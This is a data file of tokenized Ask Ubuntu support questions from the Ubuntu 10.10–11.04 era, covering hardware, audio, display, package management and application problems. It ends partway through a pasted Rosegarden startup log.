44838	wireless logitech m305 mouse wo n't work	i have a dell inspiron 15 ( something ) laptop running ubuntu 11.04 ( downloaded two days ago ) . however my wireless logitech m305 mouse does n't work . it 's a usb port wireless mouse with the driver in the usb connector . it is on and was working fine two days ago . i found some commands and i saw it was recognised as mouse1 in one of the usb ports , i can no longer find the site i was looking at to fix it and need some guidance . i know enough to know how to enter and use commands in the terminal but i am completely green to linux . any help will be greatly appreciated .
44846	move installation to an other hd	by mistake i have installed my ubuntu 11 on a wrong drive . what 's the damage i face ? a new installation ? is there any tweak for that ? this is a 80gb western digital that needs to be shifted to 350gb western digital . i have configured the machine to be my dev machine , after 2 days of configuration i discovered the mess . i want to move it completely , like an `` image '' , any chance for that ? thanks
44847	using the terminal to update twitter	trying to update twitter using the terminal . curl and wget codes i have found are not working , it looks like twitter has updated the way it authenticates , is it still possible to update twitter from command line ? this code is just saying basic authentication is not supported . curl -u user -d status= '' tweeting from the shell '' http : //twitter.com/statuses/update.xml
44849	how to configure chrome to open magnet url 's with deluge ?	after upgrading to ubuntu 11.04 ( natty ) from 10.10 , i can no longer open magnet ( torrent ) links in chromium , and set deluge to automatically open and accept the url . ( edit : currently `` .torrent '' files are not a problem , but magnet url 's , e.g . of the form `` magnet : ? xt=urn : ... '' , are now the only problem . not sure if something updated ... ? ) rather , now only transmission will automatically open torrents , magnet links , etc . there does n't seem to be a way to set deluge to be the default torrent client . ( and , there also does n't seem to be a `` default application '' setting for bittorrent client to replace transmission w/ deluge . ) notes : i found some old threads on this issue , and only a one or two newer ones . the newer threads seem to suggest xdg-open is to blame . but not many people seem to be running into this problem , so ... maybe it 's just me ? not using firefox , so manually setting apps for mime-types or extensions does n't work ( that 's not an option in chrome/chromium , afaik -- you have to rely on the os ) i uninstalled transmission , and then basically nothing happened when clicking on torrent/magnet links . running from the shell also opens transmission ( not deluge ) : xdg-open `` magnet : ? xt=urn : bt.. & tr=http : //tracker ... ..com/announce '' my current url handlers are : $ gconftool -a /desktop/gnome/url-handlers/magnet command = deluge `` % s '' needs_terminal = false enabled = true the only work-around i have ( which does work ) is to rename /usr/bin/transmission-gtk { , .bak } and create my own /usr/bin/transmission-gtk : $ cat /usr/bin/transmission-gtk # ! /bin/bash deluge `` $ @ '' anyone else run into this , know of a bug , workaround , or ... ?
44850	no bash completion in vnc connections ?	bash completion is not working with a vnc connection . i works if i login with ssh , but not with xterm/bash in a vnc connection . i tried with different display managers and with different machines , no solution . i checked .bashrc - it is enabled . i have no idea where to look now .
44851	possible to format/create partitions with clonezilla ?	i am wondering if its possible to create/format/resize partitions with clonezilla ?
44855	download source to build application myself	many open source projects provide their source code in different version , for the various systems such as windows , debian , fedora etc . since ubuntu is debian based , should downloading the project for debian suffice and i wo n't have to do any modification to it ? one example i would like to give is code : :blocks , they have a project source file for debian and none for ubuntu . so this debian version can be downloaded and can be easily built in ubuntu , right ?
44861	are there geographical restrictions to the software center ?	i am not able to see even a single application for purchase in ubuntu 11.04 natty narwhal software center . it has been the like this ever since i did clean install over 10.10 . are available applications restricted to geographic boundaries ? i live in india . how many apps can you see on your computer ? can someone guide me into getting this feature in back in the software center ?
44862	switched to debian 6 , but still have home encrypted	i was thinking of going back to debian , because of old times . so i did a fresh install on my computer . and tweaked my login-name as well what id totaly forgot was that i have encryption on my home in ubuntu and now im stuck without all my documents and other stuff how can i get it back ?
44863	how do i fix `` wireless network disabled by hardware switch '' ?	my wifi network died last night . i restarted the router but it did n't help . i have an asus 1201n and i 'm running 11.04 ! i 've checked the other questions on this subject but none has an answer .
44864	ubuntu replacement for irfanview	on windows i really liked irfanview as a basic image editor/manager . some of the main features i liked were great shortcut keys good batch conversion options ability to work with many image file formats easy viewing of images in a folder ability to open the program and paste the clipboard and do a quick save simple cropping though it did have a lot of features , they tended not to get in the way of simple tasks . what would be a good replacement on ubuntu ?
44867	does changing a partition-type lead to data loss ?	before i go change my partition type from ext3 to ntfs in my ubuntu machine , i wanted to confirm will it affect or corrupt the files present in the disk . it would help if you know a problem or share any problem that you might have experienced doing this kind of stuffs . how : i saw in ubuntu you have a package called disk utility which will help you change the partition , but if you think there is a better way to get this done , please do n't mind sharing it . thanks . i tried google to find the answer but you ca n't get an answer for everything , so decided to ask the experts here . please help . i know this is not useful , but for those who have a dual os with windows it could be useful to share files between windows and linux .
44871	how to burn isos with lxde + ubuntu ?	i am trying to burn iso 's with ubuntu installed with lxde . in the right click menu , i think archive mounter is what i am supposed to use ? but when i click that , nothing happens . what can i use to burn iso 's then ?
44872	git basics , how can i grab files from git ?	i am new to git so chances are there is a simple answer . i have a git command for grabbing a site git clone git @ devel.foobar.com : foob.com.git now when i run this i am prompted for a password via gui . ( enter a password to unlock the private key ) my local root , and user passwords do n't work . what 's going on ? do i need to get a password from the git repository manager ? edit- sorry , it was for grabbing drupal sites . i thought this may have been a common issue among others here . edit- answer is - password is the passphrase you make locally when you create an ssh key .
44873	prevent launcher from showing when super key is merely held down or when it 's combined with another key	context i like using the super key as a modifier key as part of various keyboard shortcut combinations . for example , as part of grid i have two shortcut keys ( super+h and super+l ) that put windows to the left and right respectively . however , when ever i use these shortcut keys the unity launcher menu is displayed as well . this does not happen when i press windows+1,2,3 . i also like the fact that in general the unity launcher menu is triggered by the super key ( i.e. , when not pressed in combination with another key ) . so i do n't want to disable it completely . question is there a way of preventing the unity launcher menu from displaying when the super key is combined with another key ?
44874	will a virtual box installation have low disk performance	i understand that if you install ubuntu on windows using wubi , there are disk performance issues since the entire system is mostly concentrated on a single file . what about the case of a virtual box , will it have improved performance over just installing on windows with wubi , or underneath they are the same thing .
44878	window placement on unity does n't open programs on workspaces 3 and 4 , how can i fix it ?	i 'm working on an article for my site about using window placement rules . on ubuntu classic i can create all the rules i want ( open evolution on workspace 2 , liferea on workspace 3 , gwibber on workspace 4 and so on ) but on unity if i assign a program to workspace 3 or 4 it will be opened on workspace 2 . i disabled the unity plugin but that leaves me with no panels and just a wallpaper . can someone help me out with this problem ?
44883	displayport with intel integrated graphics	i have a hp compaq 6000 pro small form factor which has a displayport output and ubuntu 11.04 installed . the machine has integrated intel graphics . i am trying to connect the machine to a monitor with displayport to displayport to use as a second monitor . when booting , the screen recognizes the machine and bios startup is displayed , however when ubuntu loads the screen goes black and the monitor goes into sleep mode . the screen can not be detected from system > preferences > monitors . unfortunately the hp compaq 6000 pro only has vga and displayport - it does n't have dvi since it is a small form factor . i do n't have a displayport > dvi adapter either , but this should n't make a difference , it would appear to be an intel/xorg problem with recognizing the displayport device . could anybody suggest a way to debug this problem ? any help is much appreciated .
44888	why wo n't my wifi work with a belkin usb dongle and wpa2 ?	i am using a belkin usb dongle to connect to my wifi network with a wpa2 key . most of the times ubuntu is not able to connect to the network automatically and keeps on asking for the key , even though the correct key has already been entered . it connects after restarting networking multiple times . i am on 11.04 with the latest updates .
44892	rsyncing /home between 10.04 and 11.04	my co-worker has an old laptop with ubuntu 10.04 installed on it . about a week ago i backed up her /home directory using rsync , and kept it on an external hd . now , she got a new laptop with ubuntu 11.04 . i am still pretty new to the ubuntu file system , so my question is this : can i just rsync an ubuntu 10.04 /home backup onto an ubuntu 11.04 machine ? are there any directories i should not copy from the backup ?
44895	windows jutter from place to place in classic desktop with ati driver	i just uninstalled gnome 3 and had to reactivate my ati driver , it should now be working fine but it is n't . i 'm using ubuntu 11.04 with the classic theme and when i drag the windows around they jutter from place to place , this never used to happen . how can i fix the lag ? cheers ,
44896	how can i move all windows to one screen with a single command ?	when undocking my laptop from twinview external monitors back to a single screen i would like to have a single command to move all windows onto my primary screen . although nvidia does some of the work so that i can see the edge of the windows , moving each one with the mouse , keyboard or compiz plugins takes time .
44898	where can i see if the server i update from is up to date ?	after talking about this with some people i found out they had newer versions of the software i had but , at that time , i had no updates for my system . a day later those updates did show up and i was able to get the fix that i needed to solve a problem . so i was wondering if i could find out with a command or at a website if the repositories i use are indeed up to date and/or how long it will take for it to be up to date .
44908	what is the difference between ext3 & ext4 from a generic user 's prespective	what are the very big differences between ext3 and ext4 from a generic user 's perspective ? i heard , sticking with ext3 is wiser . is it true ? edit : one thing i want to note that , i am a dual user ( windows & ubuntu ) , so not being able to mount a drive ( ext4 ) from windows is a big -ve for me . but , ext3 has this privilege .
44913	can udev be used ( udev rules ) to whitelist certain usb devices ?	can udev be used ( udev rules ) to whitelist certain usb devices ? what i mean is that only devices in a list i create ( containing device ids that i can obtain with lsusb ) will be passed on / processed by udev . those not in my list should be ignored by udev as soon as possible ( without even notifying the driver for the device ) . i 've heard about `` udev rules '' . if you know something about how udev rules work , do you think it is possible to use them for my purposes ? you may be wondering why i want this . this is for security purposes . see more details here about such vulnerabilities : http : //www.charlescurley.com/blog/archives/2011/03/13/linux_usb_vulnerability/index.html
44914	what to check before i allow upgrade from my system ?	i am using ubuntu 10.10 from last two months , i faced many problems while installing and stabilizing the os [ first tried to normal dual boot , but had to install through wubi ] . it cost me three re-installations and loss of some data to stabilize my os . currently the upgrade manager constantly shows that an upgrade to 11.04 is available for my system . what should i check before i go ahead for upgrade ?
44917	can evolution and thunderbird share an addressbook ?	i 'm trying to get my new android phone running without speaking to google or sending them my data . for the moment , i 've got funambol running , but funambol does n't have a thunderbird client . they do have an evolution plugin , however . i 'm not prepared to switch over to evolution , because i really like thunderbird and have it all set up just so . so i 'm trying to figure out a way to get evolution to read my thunderbird address book or vice versa . that way i can sync thunderbird to evolution , evolution to funambol , funambol to android . i 'm open to better solutions here , too .
44921	how to change shift + < keypad key > behavior ?	i am used to use the numeric keypad for navigation ( e.g . : [ kp7 ] - > start , [ kp1 ] - > end , [ kp4 ] - > left , etc ... ) . i am also used to use it for selection ( e.g . : shift+ [ kp7 ] - > select from cursor position to beginning of line , shift+ [ kp1 ] - > select from cursor position to end of line , etc ... ) with the keyboard configuration installed with ubuntu , though , shift+ [ kp7 ] prints the character `` 7 '' , shift+ [ kp1 ] prints `` 1 '' , etc ... how can i change this so that shift+ [ kp-key ] is not mapped to [ key ] , but to shift+ [ kp-key ] ?
44923	do n't display media on the desktop	how can i get media icons to not display on the desktop ? i do not want them there because they already show in the launcher on the left and there is no point in having them both places .
44925	how can i create a filesystem `` view '' of a folder that excludes certain files ?	i want to have a path in the filesystem that shows the entire contents of some other path , excluding a few certain files of my choosing . for example , if the following already exists , original-path ├── file1 ├── file2 ├── file3 ├── file4 ├── folder1 │ ├── file1 │ └── file2 └── folder2 ├── file1 └── file2 i want to be able to exclude /file1 , /folder1/file1 , and /folder2 from a new path that otherwise points to the same data : new-path ├── file2 ├── file3 ├── file4 └── folder1 └── file2 how can i accomplish this ? some kind of bind mount , fuse filesystem , or clever linking scheme ?
44926	blank screen after upgrading to 10.04 to 10.10	i have upgraded my desktop to lucid from karmic online through update manager - facing problems , request your help . after completing upgrade and then reboot , i am getting blank screen . tried to login but unsuccessful . also the data backup done pre-upgrade was partial , i donot want to lose data . request to please provide steps to rollback without losing data as i am new to ubuntu . also i have a single partition . graphics card is agp-8x integrated ( hp d530 )
44930	what does `` local or obsolete '' mean in synaptic	in the synaptic package manager there is a category `` installed ( local or obsolete ) '' . for whatever reason i have a bunch of packages listed there . as you can see from the screenshot , the packages are open office packages . i doubt that open office became obsolete , or local ( whatever that means ) . i am using ubuntu 10.04 . what does `` local or obsolete '' mean in synaptic , and why do packages become `` local or obsolete '' ?
44935	how do i search for a file or directory in ubuntu server ?	it 's often that i need to locate the path to files and directories in ubuntu server . are there any good way to search for files or directories in the filesystem by name ?
44942	ubuntu one sync seems frozen ?	using ubuntu 11.04 i started ubuntu one today , and put 14 files in the sync folder . the total size of the 14 files is 295 mb . after 11 hours , and since about 5 hours ago , the command u1sdtool -- current shows the same thing current uploads : path : /home/ubuntuone/20110524/home-dev-all-20110524.tar.gz deflated size : 45355790 bytes written : 45355790 path : /home/ubuntuone/20110524/home-misc-20110524.tar.gz deflated size : 68366485 bytes written : 68366485 path : /home/ubuntuone/20110524/home-windoze-20110524.tar.gz deflated size : 42369328 bytes written : 42369328 path : /home/ubuntuone/20110524/home-documents-20110524.tar.gz deflated size : 86213754 bytes written : 86213754 current downloads : 0 and the state also is the same : $ u1sdtool -s state : queue_manager connection : with user with network description : processing the commands pool is_connected : true is_error : false is_online : true queues : working the u1 page tells me that my files are 62 mb ( ~5 % ) . is it supposed to be that long ? is there a problem ?
44944	devices tab has no `` connect '' option	i had n't been using ubuntuone but now that i 'm looking at ways to sync my phone and desktop addresbooks , i 'm trying it again . i walked through the setup instructions but was n't seeing anything in the device tabs . so i followed the troubleshooting tips for 10.04 lucid , and got as far as the access confirmation dialog . now i see my desktop listed on the ubuntuone preferences device tab , but i do n't have the option to connect to it . i 'm using networkmanager -- there 's nothing fancy about my ethernet connection . there 's nothing revealing in .cache/ubuntuone/log/oauth-login.log 2011-05-24 17:04:47,645:645.283937454 ubuntuone-login starting ubuntu one login manager version 1.2.2 nor in .cache/ubuntuone/log/u1-prefs.log 2011-05-24 17:04:45,618 - ubuntuone-preferences - debug - starting what am i missing here ?
44945	why are some open office packages marked as `` local or obsolete '' in synaptic	this is a follow up to this question . i have not installed open office manually . i doubt that open office has been dropped from the repositories . so why are open office packages marked as `` local or obsolete '' in synaptic ? i am using ubuntu 10.04 . update i highly doubt that the switch to libreoffice is the cause for the open office packages being marked `` local or obsolete '' . several reasons : there are more than just the open office packages which are marked `` local or obsolete '' . for example : python-uno , scim , and xserver-xorg-input-wacom . this link explicitly says that ubuntu 10.04 still uses open office . there are no libreoffice packages in the ubuntu 10.04 repositories . as the link above says , one has to use a ppa to get libreoffice . i am pretty sure ubuntu will not drop open office packages without having replacements in the official repositories . ubuntu 10.04 is a lts ( long term support ) version . canonical is very conservative with upgrades on lts versions . ubuntu 10.04 even still uses firefox 3.6 . usually , when they do such updates , there is a transitional package which conflicts with the old packages so they get uninstalled . so happened with the old adobe flash plugin package .
44947	using maverick how to upgrade certain packages to newer versions ?	i tried natty and was just terrible , even gnome classic was buggy . so i switched back to 10.10 and all is well . however , i miss the newer versions of rhythmbox , empathy , gwibber , etc that are in natty 's repo ... is there any way to upgrade only those packages ? i do n't want to add the natty repos because i fear it will constantly bug me about upgrading everything else ... thanks !
44952	why does banshee recognize my android on ubuntu , but not on mythbuntu ?	i have one computer with ubuntu 11.04 , and another computer with mythbuntu 11.04 . both have banshee 2.0 installed . banshee on the computer running ubuntu automatically detects my android device when i plug it in by usb . i can copy files to and from the device within the banshee interface no problem . banshee on the computer running mythbuntu does n't detect it . the device does get mounted on the desktop and is accessible via thunar . it 's only banshee that refuses to see it . what 's the difference that 's holding my mythbuntu machine back ?
44953	how to enable true remote login	i do n't quite know how these things are called , so a search did not product any help . i 've got two computers , a desktop and a netbook . the netbook is really weak , and there 's hardly any fun doing work with it , especially after ubuntu software swallows so much cpu power for nothing . but my desktop is good , but uncomfortably positioned . so i know you can use any linux system as a server to give logins . i want to be able to login and work on my desktop , from my netbook . no vnc , no ssh , full x-server , i want to be able to choose `` login on desktop '' in my login menu on the netbook and have everything as if i was there . i hope i could make my point . is it possible in a local network ? and if so , how can i easily set it up ?
44955	how can i install eclipse with ant 1.8 ?	i have previously installed eclipse on lucid with ant 1.7 with no trouble . i need to update my ant to 1.8 , but this required me to uninstall eclipse , since the `` ant1.8 '' package is n't seen by apt-get as satisfying the eclipse package 's requirement for ant > = 1.7.blah . what do i need to do to convince apt-get that the eclipse package 's ant version requirement is satisfied ? thanks !
44958	ca n't stream hd on ubuntu but can easily on windows	hi i have my laptop dual booted with windows 7 and the newest version of ubuntu . on windows i can easily stream hd programs from iplayer with no stuttering but on ubuntu its very stuttery and even unwatchable . also when on ubuntu i also cant even stream not so good quality programs in fullscreen as that stutters to . is there anything i can do ? thanks .
44966	how to switch audio output between laptop speakers and docking station , or at least disable jack sense ?	i got an hp 8530w elitebook laptop which is in a docking station quite often . when it 's in the docking station , i 'd like to be able to choose if sound comes from my built-in laptop speakers ( for watching a quick video ) or from the audio out jack in the back of the docking station , which is connected to my stereo ( for movies and music listening ) . i can switch by physically unplugging the audio cable in the docking station , but that 's neither elegant nor convenient . i know this is possible hardware-wise , because up until about 9.04 or so , this worked with a little trick ( pressing the hardware-mute button while hovering the speaker icon in the gnome-panel changed between speaker and dock output ) . i knew then that this must have been a bug . after some upgrade ( no way to tell which ) this stopped working . i only see one output device ( internal audio analogue stereo ) in either sound preferences or in pavucontrol . there 's no jack sense entry in alsamixer . there 's a `` dock '' entry where i can mute the output out of the dock connector , but the internal speakers stay silent . my hardware ( touch ) mute button has no effect ( though it changes colour ) , does n't bother me though . the hardware volume adjust buttons work as expected . output of aplay -l : list of playback hardware devices card 0 : intel [ hda intel ] , device 0 : ad198x analog [ ad198x analog ] subdevices : 0/1 subdevice # 0 : subdevice # 0 output of head -n 1 /proc/asound/card*/codec # * : == > /proc/asound/card0/codec # 0 < == codec : analog devices ad1984a == > /proc/asound/card0/codec # 1 < == codec : lsi id 1040 audio device ( output of lspci -nn|egrep 'ultimedia|udio|sound|ac97|ac97|emu ' ) 00:1b.0 audio device [ 0403 ] : intel corporation 82801i ( ich9 family ) hd audio controller [ 8086:293e ] ( rev 03 ) any ideas ?
44967	dual-monitor : ca n't make gnome-panel and new windows default to first monitor	i have my laptop monitor and my external monitor . what i 'm trying to do is have both monitors enabled , but the gnome-panel should be on my laptop monitor . also , when i open new windows ( browser , application , anything.. ) this should be displayed on my laptop monitor . i.e. , the external monitor should only have windows i dragged directly to it . how ? ps : tryed enabling the option make this the primary display for the x screen , but this option make new windows open on the external monitor , instead of the damn laptop monitor setted to be the primary display , as the option says . i ca n't get this settings correctly . any help ?
44970	gedits gedit-latex-plugin not working correctly	i installed ubuntu 11.04 yesterday and am now working on setting things up correctly . i am having a problem with gedit-latex-plugin for gedit . i can install it and enable it , and i get the extra menus and all that . i have installed rubber , but if i try to compile a file , nothing happens . if i select e.g . latex - > pdf , nothing happens . not even verbose output on the bottom panel . i am very new to ubuntu so maybe i am overlooking something .
44971	when to update packages ?	i am using kpackagekit to maintain my system , and i am trying to keep all pack up to date ( but i did n't enable any experimental or beta repositories ) . in my opinion such setup should not break anything , but that does n't seams to be the case . two weeks ago after an update , the flash player stopped working . after another update , something else . so , the question : how to know when to update the packages , but not to break anything ? even if something broken gets in , is there a way to revert changes ?
44976	any plans to add a win7-style `` preview pane '' for previewing files in nautilus ?	one feature i enjoy in windows 7 is the windows explorer 's preview pane . will something similar be added to nautilus for ubuntu at some point in the future ?
44985	speakers only pop & hiss after system crash - no more sound	my system has been suffering from random freezes lately . i think it might have something to do with my graphics card which i 've hopefully fixed it . however , after one of those freezes i was forced to reboot my system and since then my sound no longer works and more specifically all i hear out of my speakers are random pops every 5-10 seconds . this was a clean install of ubuntu 11.04 and sound was working previously just fine . the speakers still work as i 've tested them on another machine . i was not attempting to fix the graphics card problem at the time the sound stopped working , i fixed that problem later after the sound was already popping . i 've tried removing ~/.pulse & ./pulse-cookie i 've tried reinstalling pulseaudio with : sudo apt-get -- purge remove linux-sound-base alsa-base alsa-utils sudo apt-get install linux-sound-base alsa-base alsa-utils i 've added options snd-hda-intel model=auto to my /etc/modprobe.d` file . my sound is not muted . the speakers pop even if my volume is muted . alsamixer shows that all my volume levels are set to 100 % i do not have my hdmi selected instead of my regular stereo analog output ( in fact , i 've disabled my hdmi output entirely in system - > preferences - > sound ) i 've made sure that my user account is added to the audio , pulse and pulse access groups . here are a couple of outputs that might be useful : $ dmesg | grep -i hda [ 5.455970 ] hda intel 0000:00:14.2 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 5.545302 ] hda intel 0000:01:00.1 : pci int b - > gsi 19 ( level , low ) - > irq 19 [ 5.545305 ] hda_intel : disable msi for nvidia chipset [ 5.545349 ] hda intel 0000:01:00.1 : setting latency timer to 64 [ 471.612677 ] hda-intel : irq timing workaround is activated for card # 0 . suggest a bigger bdl_pos_adj . [ 1078.442662 ] hda-intel : irq timing workaround is activated for card # 2 . suggest a bigger bdl_pos_adj . $ cat /proc/asound/cards 0 [ sb ] : hda-intel - hda ati sb hda ati sb at 0xfbff8000 irq 16 1 [ u0x46d0x825 ] : usb-audio - usb device 0x46d:0x825 usb device 0x46d:0x825 at usb-0000:00:13.2-3 , high speed 2 [ nvidia ] : hda-intel - hda nvidia hda nvidia at 0xfe77c000 irq 19 $ aplay -l | grep card card 0 : sb [ hda ati sb ] , device 0 : alc892 analog [ alc892 analog ] card 0 : sb [ hda ati sb ] , device 1 : alc892 digital [ alc892 digital ] card 2 : nvidia [ hda nvidia ] , device 3 : hdmi 0 [ hdmi 0 ] card 2 : nvidia [ hda nvidia ] , device 7 : hdmi 0 [ hdmi 0 ] card 2 : nvidia [ hda nvidia ] , device 8 : hdmi 0 [ hdmi 0 ] card 2 : nvidia [ hda nvidia ] , device 9 : hdmi 0 [ hdmi 0 ] $ sudo lsmod | grep snd snd_hda_codec_hdmi 28103 4 snd_hda_codec_realtek 336693 1 snd_hda_intel 33211 2 snd_hda_codec 103804 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel snd_usb_audio 112426 1 snd_usbmidi_lib 25139 1 snd_usb_audio snd_hwdep 13604 2 snd_usb_audio , snd_hda_codec snd_pcm 96625 4 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec , snd_usb_audio snd_seq_midi 13324 0 snd_rawmidi 30486 2 snd_usbmidi_lib , snd_seq_midi snd_seq_midi_event 14899 1 snd_seq_midi snd_seq 61621 2 snd_seq_midi , snd_seq_midi_event snd_timer 29602 2 snd_pcm , snd_seq snd_seq_device 14462 3 snd_seq_midi , snd_rawmidi , snd_seq snd 67382 18 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel , snd_usb_audio , snd_hda_codec , snd_hw dep , snd_usbmidi_lib , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device soundcore 12680 1 snd snd_page_alloc 18529 2 snd_hda_intel , snd_pcm this is a desktop machine , not a laptop . any help would be much appreciated . thanks in advance . please let me know if there is any other information that might be helpful .
44986	rubymine popups and window events die after successful system resume	after i resume from sleep , rubymine must be restarted in order to be functional . things like opening files , search dialog , panes , etc are all non-responsive . this may be related to java not rubymine , but that is the manifestation on my system . using rubymine 3.1 + sun jdk . possible that firefox is also affected by this in that it begins to eat up cpu like nobody 's business after a few sleeps . could this be an issue with sleep ?
44991	window borders disappear	i have a new install of ubuntu 11.04 and sometimes the window borders will disappear . how do i prevent this or at least get them back without logging out and logging back in ( which means close all my programs ) ? i have installed wine but it is not running , but seems to make it happen more often i think when it is running , probably just cause of the exe i am running . i probably have an out of date ubuntu because i have no internet and i think ubuntu comes out of date when you get the iso , but if there was a patch i needed , i can install it .
44992	update offline ubuntu installation ?	what is the easiest way to update my ubuntu on my offline pc ? it is not permitted to connect to internet , but i can transfer files to it with a usb stick .
45000	loss of colour depth when screen restarts	since installing maverick i 've noticed that my colour depth is a lot lower than it was on lucid . there 's severe banding everywhere and i ca n't see any settings in the catalyst control center that affect this issue . i 'm dual booting windows 7 and everything displays correctly there so i can be sure it 's not a screen/hardware fault . has anyone else experienced this or found a solution ? any help is much appreciated . acer aspire 5742g radeon hd 6370m fglrx 2:8.780-0ubuntu2 ubuntu 10.10
45001	how to fix black tooltips in eclipse ?	i am having a weird problem with eclipse documentation tooltips . when i startup eclipse the tooltip works as expected : but after i press the down button the tooltip turns black : and stays like that for the rest of the session . i am using eclipse galileo and ubuntu 11.04 with the classic desktop . edit : i am only experiencing this problem in php development tools . the tooltips work in java and python projects .
45004	i keep getting a syntax error when trying to install bumblebee	i 'm getting a syntax error when trying to install bumblebee ( hardware graphics switcher ) . i 'm running ubuntu 11.04 . my computer is a sony vaio z ( vpcz122gx ) . the github page is here : https : //github.com/mrmeee/bumblebee bumblebee ( previously called prime-ng ) is the linux alternative to the nvidia optimus features in windows the syntax error is : ./install.sh : line 532 : syntax error near unexpected token ` [ ' ./install.sh : line 532 : ` if [ -f /usr/local/bin/bumblebee-enablecard ] ' thanks in advance ! -- andrew hauser
45007	how can i setup gstreamer to work with specific sf2 sound bank ?	how can i setup gstreamer ( rhythmbox ) to work with specific .sf2 sound bank ( using fluidsynth , for example ? ) thank you .
45011	how to run .desktop files from command line	i am configuring a box with openbox ( with gnome under the scenes ) , and i want to run the .desktop files in /etc/xdg/autostart/ from a script at login . but xdg-open and gnome-open do not seem to do what i want ( unless i use them in the wrong way ) . i am looking for a standard command , and do n't want to parse the desktop files looking for the exec line . also welcome would be an indication on how to tell openbox to start those desktop files in some other way , and without an ad hoc script .
45019	what should i call this key ?	microsoft calls it the windows key . compiz calls it the super key . freedesktop.org uses win and super interchangeably . gnome ambiguously calls it meta , super , or an os-logo shift key . what should i call it when teaching others about ubuntu ?
45022	very strange rosegarden crash issue ?	i have been all over the internet about this problem , and everyone seems to have slightly different but unrelated errors to mine . rosegarden was working yesterday . now , every time without fail , it will display the splash screen , some hint of a window , but then the area of the screen `` freezes '' and does n't refresh ( where you can `` paint '' over the area by dragging a window over it ; ) ) i tried : sudo apt-get purge rosegarden sudo apt-get autoremove sudo apt-get install rosegarden with a seemingly fresh install , things happened the exact same way . here 's the terminal output : setting graphics system for qt 4.5+ to : raster thorn - false system locale : en_us qt translations path : /usr/share/qt4/translations qt translations not loaded . rg translation : trying to load : locale/en_us rg translations loaded successfully . loaded application icon `` rg-rwb-rose3-16x16 '' loaded application icon `` rg-rwb-rose3-32x32 '' loaded application icon `` rg-rwb-rose3-48x48 '' loaded application icon `` rg-rwb-rose3-64x64 '' loaded application icon `` rg-rwb-rose3-128x128 '' note : found stylesheet at `` : /rosegarden.qss '' , applying it not loading stylesheet per user request . caveat emptor . qsettings : :endgroup : no matching begingroup ( ) alsadriver : :alsadriver [ begin ] rosegarden 10.10 - alsadriver [ alsa library version 1.0.23 , module version 1.0.23 , kernel version 2.6.38-8-generic ] can not connect to server socket err = no such file or directory can not connect to server socket pluginfactory : :instance ( dssi ) : creating new dssipluginfactory ladspapluginfactory : :discoverplugins - discovering plugins ; path is [ /home/chase/.dssi ] [ /usr/local/lib/dssi ] [ /usr/lib/dssi ] can not connect to server socket err = no such file or directory can not connect to server socket jackdmp 1.9.7 copyright 2001-2005 paul davis and others . copyright 2004-2010 grame . jackdmp comes with absolutely no warranty this is free software , and you are welcome to redistribute it under certain conditions ; see the file copying for details can not create thread 1 operation not permitted can not create thread 1 operation not permitted jack server starting in realtime mode with priority 10 can not lock down memory area ( can not allocate memory ) ladspapluginfactory : :discoverplugins - done pluginfactory : :instance ( ladspa ) : creating new ladspapluginfactory ladspapluginfactory : :discoverplugins - discovering plugins ; path is [ /home/chase/.ladspa ] [ /usr/local/lib/ladspa ] [ /usr/lib/ladspa ] control device hw:0 control device hw:0 audio_reservation_init acquire audio card audio0 creating alsa driver ... hw:0|hw:0|1024|2|44100|0|0|nomon|swmeter|-|32bit control device hw:0 using alsa driver hda-intel running on card 0 - hda intel at 0x90700000 irq 46 configuring for 44100hz , period = 1024 frames ( 23.2 ms ) , buffer = 2 periods alsa : final selected sample format for capture : 32bit integer little-endian alsa : use 2 periods for capture alsa : final selected sample format for playback : 32bit integer little-endian alsa : use 2 periods for playback port created : midi-through : midi/playback_1 port created : midi-through : midi/capture_1 port created : usb-uno-midi-interface : midi/playback_1 port created : usb-uno-midi-interface : midi/capture_1 can not use real-time scheduling ( rr/10 ) ( 1 : operation not permitted ) acquireselfrealtime error ladspapluginfactory : :discoverplugins - done can not lock down memory area ( can not allocate memory ) can not use real-time scheduling ( rr/5 ) ( 1 : operation not permitted ) acquirerealtime error jackdriver : :initialiseaudio - jack sample rate = 44100hz , buffer size = 1024 jackdriver : :initialiseaudio - creating disk thread jackdriver : :initialiseaudio - found 4 jack physical outputs jackdriver : :initialiseaudio - connecting from `` rosegarden : master out l '' to `` system : playback_1 '' jackdriver : :initialiseaudio - connecting from `` rosegarden : master out r '' to `` system : playback_2 '' jackdriver : :initialiseaudio - found 4 jack physical inputs jackdriver : :initialiseaudio - connecting from `` system : capture_1 '' to `` rosegarden : record in 1 l '' jackdriver : :initialiseaudio - connecting from `` system : capture_2 '' to `` rosegarden : record in 1 r '' jackdriver : :initialiseaudio - initialised jack audio subsystem alsa client information : 14,0 - ( midi through , midi through port-0 ) ( duplex ) [ ctype 2 , ptype 655362 , cap 99 ] 20,0 - ( usb uno midi interface , usb uno midi interface midi 1 ) ( duplex ) [ ctype 2 , ptype 589826 , cap 127 ] alsadriver : :setcurrenttimer ( ( auto ) ) extractversion : major = 1 , minor = 0 , subminor = 23 , suffix = `` '' alsadriver : :versionisatleast : is version 1.0.23 at least 1.0.14 ? yes extractversion : major = 2 , minor = 6 , subminor = 38 , suffix = `` generic '' alsadriver : :versionisatleast : is version 2.6.38-8-generic at least 2.6.20 ? yes using low-resolution system timer , sending a warning current timer set to `` system timer '' with timer checks warning : using system timer with only 250hz resolution ! alsadriver : :initialisemidi - initialised midi subsystem alsadriver : :setcurrenttimer ( ( auto ) ) extractversion : major = 1 , minor = 0 , subminor = 23 , suffix = `` '' alsadriver : :versionisatleast : is version 1.0.23 at least 1.0.14 ? yes extractversion : major = 2 , minor = 6 , subminor = 38 , suffix = `` generic '' alsadriver : :versionisatleast : is version 2.6.38-8-generic at least 2.6.20 ? yes using low-resolution system timer , sending a warning current timer set to `` system timer '' with timer checks warning : using system timer with only 250hz resolution ! composition : :gettrackbyid ( 0 ) - warning - track id not found , this is probably a bug src/base/composition.cpp:1560 available track ids are : alsadriver : :adddevice ( 0,0 ) created output port 3 : out 1 - unnamed for device 0 renamed 129:3 to general midi device alsadriver : :adddevice ( 0,1 ) alsadriver : :setrecorddevice : device 1 , action 1 warning : alsadriver : :renamedevice : can not find device 1 in port map port created : rosegarden : midi/capture_1 port created : rosegarden : midi/playback_2 port created : 